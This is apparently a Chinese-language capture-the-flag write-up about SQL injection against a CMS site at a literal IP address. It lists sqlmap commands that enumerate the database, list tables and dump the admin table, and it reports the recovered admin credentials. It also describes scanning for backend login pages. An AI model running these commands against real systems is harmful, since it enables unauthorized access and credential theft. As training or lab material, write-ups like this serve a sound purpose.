拿到网站
简单观察后发现url区域存在传参
简单测试找到存在注入的界面(此网站多处网址存在注入)
这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入
我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破
sqlmap -u 180.76.226.182/about.php?listid=6 --current-db
爆当前数据库名
得到数据库名为“510cms”
然后指定该数据库爆它的所有表
sqlmap -u 180.76.226.182/about.php?listid=6 -D 510cms --tables得到如下一些表
根据经验我们爆510_admin表的所有内容
sqlmap -u 180.76.226.182/about.php?listid=6 -D 510cms -T 510_admin --dump
需要等待较长时间
这里找到第一个flag
并找到登录后台的name和passwd
admin—123qwer(采用md5加密)
但是我们没有发现登录后台的地址
所以我们尝试使用御剑扫描此网站
发现很多网站后台
逐一打开查看能够找到管理登录的界面和一些没有权限登录的界面
其中没有权限登录的界面点击提示后同样打开管理登录界面